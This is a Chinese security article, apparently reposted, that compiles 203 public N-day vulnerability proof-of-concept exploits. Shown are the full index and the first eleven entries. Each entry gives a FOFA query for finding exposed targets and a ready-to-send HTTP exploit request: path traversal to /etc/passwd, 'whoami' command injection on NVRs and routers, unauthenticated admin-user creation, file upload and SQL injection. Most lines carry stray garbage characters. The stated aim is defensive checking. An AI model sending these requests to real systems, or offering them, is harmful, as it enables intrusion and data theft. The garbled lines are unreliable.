互联网公开漏洞整理202309-202406. ]* U) I$ L) z" t$ |
道一安全 2024-06-05 07:41 北京* j0 V9 n R* U$ E# o8 {+ z
以下文章来源于网络安全新视界 ,作者网络安全新视界, J: U3 S: O: ^5 _
& O, p- {) H- z$ ? m! o发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
1 I0 q# l, z* D
! g3 C* l% f$ n1 }* ^% } a漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。( w* S7 Z: F: i( G( A( ~% w/ |" J
h. i0 l# r4 Z; K安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。. m6 X; L, Q' l) f8 B6 o7 ~4 v1 [: ^
4 N p$ d( U0 R( Q% Z
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。7 I; n) P) x6 r* f2 A
, j5 D# h/ Y' G X
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。9 ?+ [+ T$ C& E, d. g" A
' V7 ~8 z, l2 G- p# w% Z5 M8 n& Q1 Y0 |
声明
( w' p, g0 }2 [' z( X( n
8 B( `% J% ]' {! @) Q" b' X! E为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
! U# P: {5 t+ m2 Z, K3 H* K
+ G# j5 G0 t5 p3 w有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
: e, M+ {9 |; D( k+ [
8 R& P7 k% {5 k* h5 M+ ^9 X8 ^/ ^& n9 ~9 ?
4 X" d9 W8 i: }目录0 y! u. ^+ L h/ V
$ ]$ o# I; O: S. ?' c01
0 W5 S, D6 h0 k3 z' |& S/ @
2 u7 P2 v1 o. l1. StarRocks MPP数据库未授权访问
: T/ O: X6 @' R5 _: f2. Casdoor系统static任意文件读取
8 J$ s* G0 L ?, k6 n( L3. EasyCVR智能边缘网关 userlist 信息泄漏, ~1 Q r% C6 C
4. EasyCVR视频管理平台存在任意用户添加
0 u ]. Y& h0 P$ C5. NUUO NVR 视频存储管理设备远程命令执行) d! _- [( ]" f- |; G# u
6. 深信服 NGAF 任意文件读取
: s/ |! j& Y) {; O1 d+ w7. 鸿运主动安全监控云平台任意文件下载8 r; Q. N! D2 V6 Y7 Y7 B& U
8. 斐讯 Phicomm 路由器RCE$ k8 W( W6 B8 b1 V
9. 稻壳CMS keyword 未授权SQL注入 p/ R+ W4 B( y
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
- @* J: s6 S0 S( ~11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
8 e* m) }: C/ s' |12. Jorani < 1.0.2 远程命令执行7 |( c4 y2 y* }
13. 红帆iOffice ioFileDown任意文件读取1 K1 u; O! s1 B& P, u
14. 华夏ERP(jshERP)敏感信息泄露
$ x- o p* i n15. 华夏ERP getAllList信息泄露% d$ K) i$ {& a6 }; Q0 [" z
16. 红帆HFOffice医微云SQL注入; q" _. }$ T# Z) d! ^
17. 大华 DSS itcBulletin SQL 注入& M# c q" }+ |5 c7 B
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, y n$ h$ G8 l# {+ R" i4 q19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- ]8 h0 V5 N3 b( T
20. 大华ICC智能物联综合管理平台任意文件读取# s& ?& L/ E: o u0 p& _1 s4 H) J
21. 大华ICC智能物联综合管理平台random远程代码执行- a4 X" p7 e$ z2 i
22. 大华ICC智能物联综合管理平台 log4j远程代码执行7 \2 Q5 v% d; e' P
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
' ] ?& ]$ A$ v# H; i- f& @24. 用友NC 6.5 accept.jsp任意文件上传
& j9 b7 N/ O/ \7 b f25. 用友NC registerServlet JNDI 远程代码执行
1 y" R+ @; n# U- l# \6 }1 c26. 用友NC linkVoucher SQL注入0 h1 V1 i: U, o Z; P2 J
27. 用友 NC showcontent SQL注入0 Y4 p/ i8 ?: ^' a
28. 用友NC grouptemplet 任意文件上传
4 x, ^9 c' s2 B29. 用友NC down/bill SQL注入& K# ~9 w K7 O% @+ C0 q- Y
30. 用友NC importPml SQL注入/ {5 f2 b$ Y; t0 t/ p4 c
31. 用友NC runStateServlet SQL注入4 R8 A# m) N, _; G: V! ~
32. 用友NC complainbilldetail SQL注入+ ^2 E. s7 x% |4 `* o5 k5 A2 d
33. 用友NC downTax/download SQL注入9 j$ d. [$ v; M1 R9 l. [: N
34. 用友NC warningDetailInfo接口SQL注入$ j# L% X* F% I% i! n
35. 用友NC-Cloud importhttpscer任意文件上传
2 v5 d3 {( W4 b, b+ g36. 用友NC-Cloud soapFormat XXE, Z, A' `/ N7 ]# H9 V$ H
37. 用友NC-Cloud IUpdateService XXE( }5 Z h" C5 \
38. 用友U8 Cloud smartweb2.RPC.d XXE9 O- @5 G2 _* L; [. N+ [. \$ }
39. 用友U8 Cloud RegisterServlet SQL注入
; ]- Y) O: ?" M1 y' |( }% _40. 用友U8-Cloud XChangeServlet XXE
; e" E5 _+ W. n5 O2 K0 ]41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% q; v H* `" P2 v2 ?42. 用友GRP-U8 SmartUpload01 文件上传
% z7 f- V6 t& z6 _. V. u4 ]43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. [ H* {1 [4 D l6 T' c44. 用友GRP-U8 bx_dj_check.jsp SQL注入
5 a3 g5 i, H- b! P! j45. 用友GRP-U8 ufgovbank XXE
, ~0 ]8 t& Z1 q* q46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) W# S* ^; f' R! L" s) s8 t- r$ K47. 用友GRP A++Cloud 政府财务云 任意文件读取7 u2 V; _7 z* O/ D8 H6 [3 N0 T8 U
48. 用友U8 CRM swfupload 任意文件上传' u O! J. {3 T' w2 r) o5 I4 H
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% I# H1 R. l/ S8 Q$ k Y6 L50. QDocs Smart School 6.4.1 filterRecords SQL注入: P O) J5 C/ P8 V
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
' f1 B8 K3 F! q% E/ m6 L52. 泛微E-Office json_common.php sql注入
& F; S+ H j& _53. 迪普 DPTech VPN Service 任意文件上传( f" o$ P1 P$ R2 E) Q9 p- E* U) A
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( h5 T" F# H3 j8 H9 L0 s+ N% N! F' m0 A' ]55. 畅捷通T+ getdecallusers信息泄露
2 {. I: N7 f2 _# X7 }9 f- Y56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- T/ J! ~. v% F$ |: ?7 ~
57. 畅捷通T+ keyEdit.aspx SQL注入
- M3 P: h6 P" l2 W8 G; Y58. 畅捷通T+ KeyInfoList.aspx sql注入
) D, {( j) Z' ^1 E( G& s1 L U59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行1 i) d9 ]1 B6 R7 S# t- v3 i
60. 百卓Smart管理平台 importexport.php SQL注入- S8 _# x$ q5 c# W: I* O, H. h
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传( Q G* K( z: o/ {' {
62. IP-guard WebServer 远程命令执行
4 P* H0 {5 f, P0 |% f63. IP-guard WebServer任意文件读取
: v1 [1 v) Q$ U0 P& k6 e64. 捷诚管理信息系统CWSFinanceCommon SQL注入+ C1 l( [4 w& J# u! h: z
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" A. p8 K }$ \: K |
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
' p" ~8 z& I" ?$ ]% r67. 万户ezOFFICE wpsservlet任意文件上传, v7 D8 C; W) m% v7 M" Y4 b
68. 万户ezOFFICE wf_printnum.jsp SQL注入
8 M9 F/ y% b9 z c& Q69. 万户 ezOFFICE contract_gd.jsp SQL注入( E6 p4 i3 T0 H& c
70. 万户ezEIP success 命令执行
! m! y$ I2 N' P5 [" C, T71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入3 D4 W* |$ N# _2 O, Z A- h a6 [
72. 致远OA getAjaxDataServlet XXE
2 ]7 W4 c4 P0 i* G/ @, S: \( o73. GeoServer wms远程代码执行7 U" F3 @7 t9 I( X" s5 x
74. 致远M3-server 6_1sp1 反序列化RCE
# m' {( h5 I$ m+ n& X; {75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
# \! Y* c" V' c$ X& J' ^76. 新开普掌上校园服务管理平台service.action远程命令执行2 h, T& U: r$ Y2 c" u$ L4 S O
77. F22服装管理软件系统UploadHandler.ashx任意文件上传) q r- E$ d: B5 s3 j
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 ]+ U3 i0 @& \0 W5 N0 x8 g79. BYTEVALUE 百为流控路由器远程命令执行
: a+ n' b: Z5 ?9 _80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
0 ~6 k. S4 G9 L& A2 {' o81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 t- @0 m9 M! I5 B82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, E% p8 Z7 |0 y/ N83. JeecgBoot testConnection 远程命令执行
% L( B# a U2 u/ F9 |9 h0 S84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
! i5 U" U& p( c# |" |" \85. SysAid On-premise< 23.3.36远程代码执行0 e' d2 _# H0 v; w
86. 日本tosei自助洗衣机RCE
; m- T' f6 T( W# f3 S5 k87. 安恒明御安全网关aaa_local_web_preview文件上传
# t- `9 t1 i6 R) r L88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行/ t- h& S ~4 C0 t6 Z% ^! v3 h
89. 致远互联FE协作办公平台editflow_manager存在sql注入
: |: {% E4 M& U90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行* {# M( w- c0 u
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取6 U# G# y- a; r
92. 海康威视运行管理中心session命令执行( q" Z; p/ l" m5 \. g! J: ~) ^
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! l. p$ E& z! S94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
9 e5 J6 r: y7 V- Q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# X o5 e* a# j* b% m& W* @
96. Apache OFBiz 18.12.11 groovy 远程代码执行 S, I4 D& J4 S- w8 l) Q: [4 H( ^
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行- t8 N0 z; X2 G# [
98. SpiderFlow爬虫平台远程命令执行: Q8 d) ]" F) c* K8 t# L7 F
99. Ncast盈可视高清智能录播系统busiFacade RCE( `* i6 V# E1 u8 ` K p
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
3 p/ R* o( N5 Z101. ivanti policy secure-22.6命令注入9 W& E! [9 H5 [+ d. ~# ?: _0 j
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 p' N1 q/ T \) ]$ w103. Ivanti Pulse Connect Secure VPN XXE
* e; v$ _) k; `* M [+ k$ h W104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; `/ t, g1 T r105. SpringBlade v3.2.0 export-user SQL 注入6 A4 w9 v" q5 ~* g
106. SpringBlade dict-biz/list SQL 注入
* z' Z' y& H- n" R! E2 f% h6 P107. SpringBlade tenant/list SQL 注入/ C0 t6 n) X! O% W; s' J
108. D-Tale 3.9.0 SSRF
4 u' q9 x) t9 H% o109. Jenkins CLI 任意文件读取# Q; `! R( o+ I6 u0 {+ ^
110. Goanywhere MFT 未授权创建管理员$ B. H @+ Z( w7 j" [
111. WordPress Plugin HTML5 Video Player SQL注入
9 K. Y8 i7 `* P, o( K112. WordPress Plugin NotificationX SQL 注入7 m" z( `+ S( ]3 u/ T7 M9 D5 F
113. WordPress Automatic 插件任意文件下载和SSRF$ J6 M+ Q- I8 n
114. WordPress MasterStudy LMS插件 SQL注入9 F+ @, L% x/ s% [, L3 w
115. WordPress Bricks Builder <= 1.9.6 RCE
6 E8 \* i5 _/ |; a! X! s116. wordpress js-support-ticket文件上传- Z# z9 i$ K4 }* }* \, z7 t2 \$ G
117. WordPress LayerSlider插件SQL注入
% I7 s7 s n F% [: ^" w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传% F% B" u9 X& P% e8 \- H
119. 北京百绰智能S20后台sysmanageajax.php sql注入
, i9 M0 H/ S4 I120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ X7 l$ P$ Q; _+ k, \2 v7 I121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 I$ V+ ~# P; F3 u+ M
122. 北京百绰智能s200管理平台/importexport.php sql注入
( s) k, w( G* R# M& n3 _* s+ p123. Atlassian Confluence 模板注入代码执行
+ p7 x( ]+ \) ~124. 湖南建研工程质量检测系统任意文件上传
+ x- \6 C7 ~) {, M125. ConnectWise ScreenConnect身份验证绕过6 X7 v# H8 ] }
126. Aiohttp 路径遍历
- B. v8 M8 a; Y9 [, C127. 广联达Linkworks DataExchange.ashx XXE
8 F$ A' C( _ n) a; }' s0 R% V' h& d128. Adobe ColdFusion 反序列化& `0 @# ]6 T; n8 S( v, S
129. Adobe ColdFusion 任意文件读取- J7 q& i5 v) T# O/ i: E
130. Laykefu客服系统任意文件上传
7 \3 i: b6 H# e131. Mini-Tmall <=20231017 SQL注入
5 N! i- O. m ~$ ?% u132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
3 K+ ]& I0 e9 s2 @% b3 n133. H5 云商城 file.php 文件上传
: M. B1 N: H; I: ~9 x6 e- V9 R134. 网康NS-ASG应用安全网关index.php sql注入: D- q0 o2 Q7 i
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入# d, S& d9 S" l7 V! ]0 p) z. R
136. NextChat cors SSRF2 }/ ?" j4 S2 F }8 R1 j& w
137. 福建科立迅通信指挥调度平台down_file.php sql注入
+ C$ I) s$ K3 o9 l7 F8 C138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
* |6 n" g" `0 k$ Q) b7 \5 A5 P: |139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) N" w/ @% I B N5 u' r6 B, t3 k140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' y4 g/ {. D( D0 S$ |% |4 d# M$ n
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
8 Q) ^" X: X" K% Y0 `142. CMSV6车辆监控平台系统中存在弱密码
& [5 m. O/ d! ^$ x5 F" R6 |143. Netis WF2780 v2.1.40144 远程命令执行
& r7 k# \8 {( Y# G: Y4 F144. D-Link nas_sharing.cgi 命令注入5 q x: o$ k. s$ \% Y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入- m$ M0 U3 l2 L: k
146. MajorDoMo thumb.php 未授权远程代码执行
4 U% d- @; ~2 H N6 i147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
9 M, Q# \9 E5 T- N) L5 |; K# V148. CrushFTP 认证绕过模板注入( c. h) u6 @3 S) G
149. AJ-Report开源数据大屏存在远程命令执行
" y0 w# S( y5 P p150. AJ-Report 1.4.0 认证绕过与远程代码执行& l9 _8 M) X3 N: ]* i& E
151. AJ-Report 1.4.1 pageList sql注入2 _% W }* u9 K. S$ ?
152. Progress Kemp LoadMaster 远程命令执行
" c1 E. S4 s! d4 e7 Z153. gradio任意文件读取2 u# S! k5 Q; ?. W" R! ]' G
154. 天维尔消防救援作战调度平台 SQL注入% H, t9 r$ e- s7 A( k+ b$ o. P6 e
155. 六零导航页 file.php 任意文件上传. B: S' |. f& K. {. O
156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 S: p# r, G: A8 G0 |! q157. 美特CRM upload.jsp 任意文件上传! m Q" R# i- U
158. Mura-CMS-processAsyncObject存在SQL注入( |: r4 u' `! ^. m2 U
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
^& v. Z( O& o' u/ |/ o160. Sonatype Nexus Repository 3目录遍历与文件读取
m# t& g- S9 x161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 p# {4 m# W; ]* b; ^162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
: o- p8 I" d/ {' _# s% Z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传, G- z! {2 r# y' B- j: w
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
& \9 t) a# X6 ^' f H165. OrangeHRM 3.3.3 SQL 注入
- _3 p2 r3 G& l166. 中成科信票务管理平台SeatMapHandler SQL注入
0 z$ J. W$ i4 V. i167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 ] _0 S `4 `* y% `168. 宏景EHR OutputCode 任意文件读取
! S- y" e( @$ E/ R) B169. 宏景EHR downlawbase SQL注入
( u9 I( M& M: o. i& u$ I170. 宏景EHR DisplayExcelCustomReport 任意文件读取$ o2 p4 Q# `" `4 |
171. 通天星CMSV6车载定位监控平台 SQL注入& z: w8 x' `% \% C
172. DT-高清车牌识别摄像机任意文件读取
7 A6 A6 Y3 m; b" R173. Check Point 安全网关任意文件读取% @/ ] k5 \6 v" R% W0 L
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 p5 V. b ^! g; r0 K: Y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
. U# L3 V7 h7 u) ^+ D ?, e2 O176. 电信网关配置管理系统 rewrite.php 文件上传$ ]- e A3 Q& q* i5 a' a, o
177. H3C路由器敏感信息泄露8 m$ t* Q) ]9 {6 V
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
) Y# `" B) \4 U" \/ j: `4 `179. 建文工程管理系统存在任意文件读取
6 Z: |5 L e8 ^8 X w; y2 O8 p180. 帮管客 CRM jiliyu SQL注入/ h7 v+ y$ @; T$ k8 b
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
8 E/ x; p7 o4 ~182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建, L: _+ s6 M0 G
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
4 [4 E7 F, b+ F) D184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
3 i/ S5 i2 @. ]$ Q x' J185. 瑞友天翼应用虚拟化系统SQL注入- y* e8 ]& `$ D; L9 b
186. F-logic DataCube3 SQL注入. ]4 r5 ?/ w) q
187. Mura CMS processAsyncObject SQL注入7 `- _ j- _% W1 x, o5 q
188. 叁体-佳会视频会议 attachment 任意文件读取
) h# k, O/ J: F, Z189. 蓝网科技临床浏览系统 deleteStudy SQL注入. D6 g' b& @/ g E9 {
190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 h2 e; H) w; j1 H' h+ C
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
) \" i+ O N" A7 |192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
2 q2 ^% x( N* G( `# Q1 [8 h% Z193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行# M8 t# [5 `# L5 o. h
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传) U* `8 F0 F+ `6 r2 v7 x
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行3 K8 ~4 V4 q" _; \" I, J! ?, ~3 [
196. 河南省风速科技统一认证平台密码重置
6 L/ f+ V. v' d2 q: q197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* [4 P# D" w7 T& r
198. 阿里云盘 WebDAV 命令注入
* s& U! \6 C8 L5 R199. cockpit系统assetsmanager_upload接口 文件上传6 X# O7 a1 z- U9 R
200. SeaCMS海洋影视管理系统dmku SQL注入
) T- F3 O, r. ^6 F201. 方正全媒体新闻采编系统 binary SQL注入3 [ \' V+ f: R$ g& W0 g4 C. Z2 u
202. 微擎系统 AccountEdit任意文件上传
* }5 |* n5 E7 |' a$ M6 t6 O( H203. 红海云EHR PtFjk 文件上传2 Z1 T- u' \ H) s% C) f
2 I2 e' Z8 D. b' ]- g
POC列表5 Q. o6 u v h# c
# U/ Q# ~) n6 |" @
02$ u9 h# ~& c$ M& j$ V6 x. f& t
$ ?; K( _: C( J- x& l
1. StarRocks MPP数据库未授权访问, h7 @! s, W- @- f( a2 Z5 o
FOFA :title="StarRocks"
8 l# Z8 c7 }0 `. `+ aGET /mem_tracker HTTP/1.16 a+ j7 P$ M. H, H
Host: URL
' k" n; o" v7 Y/ J
- I( ]) k- N+ b4 s t% q3 W- W) c, _4 m& ?! W& y+ `4 L) S0 M. k
2. Casdoor系统static任意文件读取8 T9 i# F: k& |" j
FOFA :title="Casdoor"
! ?6 ~5 M7 a; |0 Z+ QGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1$ d: t, @4 k0 m# U, x7 P
Host: xx.xx.xx.xx:9999
; A- ~5 Z8 W' c" iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 [% l$ G. H: X' j' m8 ]7 @9 ?
Connection: close( [( L7 J) ~, m' l7 o- f( M
Accept: */*
& b( D0 S9 F8 e) J4 |; AAccept-Language: en
! t/ g6 A: N! R [+ _: c) UAccept-Encoding: gzip
' g# s1 @( T6 q- X7 b! s! @6 P! N" _8 l
; e$ I4 e5 J! ]; W3. EasyCVR智能边缘网关 userlist 信息泄漏9 Y( Z/ K$ I$ v) m# l3 V8 W
FOFA :title="EasyCVR". s2 J" g5 U6 F# l$ J7 U' X% Y) a9 L
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
/ u/ d# f' b( f' g- ], ^& fHost: xx.xx.xx.xx% D; u3 ?- O. J! w& h# Q! j
9 Z8 I* u3 X+ t8 w+ B7 ]
2 r+ v$ t5 r ~9 O% U& f4. EasyCVR视频管理平台存在任意用户添加
9 J. f$ X( R4 P+ e0 dFOFA :title="EasyCVR"4 Z2 a6 d% B e! g! Q9 e, J! M
, s- J1 g% K! [" ~+ \7 Fpassword更改为自己的密码md50 ^ U3 c c$ V) b% o/ j
POST /api/v1/adduser HTTP/1.1
! |! @( e/ p6 }& p" QHost: your-ip
, L% V2 G3 K) V0 M) K$ d) q$ [* CContent-Type: application/x-www-form-urlencoded; charset=UTF-8$ ^5 F1 }- N' q1 K- b
6 Y' C2 Q4 j- P: Q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1! |3 f# f r) v2 h1 ~
* U( R, y8 e* p' i2 v- j; x/ ?9 x1 \) g* C
5. NUUO NVR 视频存储管理设备远程命令执行
+ @' @. k. D; [FOFA:title="Network Video Recorder Login"3 A* T a4 U8 W5 R; H# k
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1, Q( U7 F& X7 s6 x, y+ E5 f, J3 F
Host: xx.xx.xx.xx7 S9 e4 P; o0 v' r2 a0 Q4 j
3 C: r! s( v: b. S/ X+ k% F0 h6 j
2 @* g* B4 o9 }- w) ]( h6. 深信服 NGAF 任意文件读取7 o! p0 U! @+ Q! w0 y/ L
FOFA:title="SANGFOR | NGAF"
- D# [& [$ s& {. }$ q: XGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
' l0 C3 m9 L. M {3 H+ {Host:, ?2 k; c M$ h+ ? |/ U: n
' ^' A, I( \; l
F3 i: J/ }" M2 f, ?5 A$ a4 W7. 鸿运主动安全监控云平台任意文件下载5 U/ r* u0 G4 F7 Q% }
FOFA:body="./open/webApi.html"0 A4 C% `% \1 u, I0 g
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
- c4 f9 B# l3 @& R& q! ?$ FHost:
- e( O& u/ U( U5 [; P% C6 T6 W @' @$ C( f I% I
2 e9 z$ [# |) ~8. 斐讯 Phicomm 路由器RCE
0 b) A( Y# X& j' d% q6 `FOFA:icon_hash="-1344736688"
, u( A6 I# J& T- |' E/ W% r默认账号admin登录后台后,执行操作
) p" I" o5 g' \0 K( ~) z- w, B& [POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.15 h) m1 M/ c; L' K; Y
Host: x.x.x.x9 H: c; k0 \% E. }8 |
Cookie: sysauth=第一步登录获取的cookie
# G9 z* V: W# H) C- q9 Z RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz% v2 Q9 s: k0 ^* c3 H
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% u: X4 i4 j( v# y) V. o. B4 a: l
3 k: H/ w% A7 c( B9 ^
------WebKitFormBoundaryxbgjoytz0 q$ ?7 j* ]2 r1 A
Content-Disposition: form-data; name="wifiRebootEnablestatus". B o2 O6 Z0 \2 v v" s
& i# g- d5 n! t9 K! n7 h8 k%s
* A$ F! m) _8 k: h------WebKitFormBoundaryxbgjoytz* O$ I4 u. a: \2 I+ Y* A5 J! H( \
Content-Disposition: form-data; name="wifiRebootrange" j* p. I( g( @/ c
' h G3 K7 n, l12:00; id;
! k. M0 R1 e, ^! d3 `------WebKitFormBoundaryxbgjoytz
2 A2 ~& Q8 Z# A& d% J+ k, l% ~Content-Disposition: form-data; name="wifiRebootendrange"' ~) o6 P6 l& J' B
4 N3 `. d: _- B8 o. C
%s:
h4 ^1 ^# ~) {/ p, N# \------WebKitFormBoundaryxbgjoytz
! R9 M: h8 m, y0 X9 }Content-Disposition: form-data; name="cururl2"
5 k I+ L! w0 ]( F8 _; |- p0 Q* o
# B" M j$ d3 ]/ j
8 t1 V( k1 F% {0 _0 d' L------WebKitFormBoundaryxbgjoytz--
. o7 z( n7 U; f( M' T
* y! R2 G& J8 Y
* n$ O8 {6 z6 X4 f7 p1 v9. 稻壳CMS keyword 未授权SQL注入" g- [+ F5 m$ z8 G0 O! u
FOFA:app="Doccms". t2 r! q( P5 y$ v, E8 k
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1) s; M" L" r( Z) {; {& ?+ p9 u
Host: x.x.x.x
& B$ F2 S* }; w. u+ c
+ V* ^& E/ j4 f3 H
4 m" ~( S" ^4 C7 {, b2 w& \- Vpayload为下列语句的二次Url编码; b" g' I+ y& _0 N8 N ?) Z! A \
; @) w; X4 @, l2 z
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#* d# s; l0 }( j. {# l; j
8 z8 F& T2 v m3 e% ^" u$ F y- L% C
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
' z8 k- g, `& _3 k) {0 g. pFOFA:icon_hash="953405444"
5 C3 d: h7 {$ e& W+ U' r
7 K( o: z0 v- _4 r+ c( H文件上传后响应中包含上传文件的路径3 y5 x! H0 f4 |0 I( l& G; f
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
5 a, h) B5 [' e! {Host: x.x.x.x:xx
3 [ ~: g0 X) q, M5 r% q/ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.361 F0 q( s+ a, q7 o! q' P+ ]
Content-Length: 197
`1 F6 I( J& V6 |3 b- b& PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' R9 Q7 v0 H5 B1 U/ a o( kAccept-Encoding: gzip, deflate2 ^: n* ^2 Y; \' _: a8 x7 V+ G
Accept-Language: zh-CN,zh;q=0.9
1 ^8 y/ e3 A! G0 Y' P N/ o+ C- OConnection: close. ]$ m i+ r4 d* c5 B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu8 ^* d( E3 P' |2 Z% B+ I, `. M5 z' P
7 y9 w; M9 B0 I; d) W
------WebKitFormBoundaryxdgaqmqu( }( i# `9 b0 y) n. D S* W# l
Content-Disposition: form-data; name="file"filename="icfitnya.txt", N; { v; M d. K+ Y
Content-Type: text/html
' Z: ~; {( A9 Q5 y2 `1 l# ?* O
jmnqjfdsupxgfidopeixbgsxbf
i. H7 l6 [& z( K5 A# V/ x; q------WebKitFormBoundaryxdgaqmqu--, ?( G |& T7 W
6 \6 l. ~" r5 v3 O+ |
$ y2 G, K3 X7 v, ~11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 v" S2 m$ b- B
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
8 Q- P# G1 l( j( C1 w2 H% UGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1! \: k7 l! i! V1 ^, r7 ~5 i
Host: 127.0.0.1
6 D, [: e. G0 B% MPragma: no-cache
; Z( @& f: C' f) GCache-Control: no-cache
) M5 d* \. p; n0 BUpgrade-Insecure-Requests: 18 c; q# z8 Z/ F
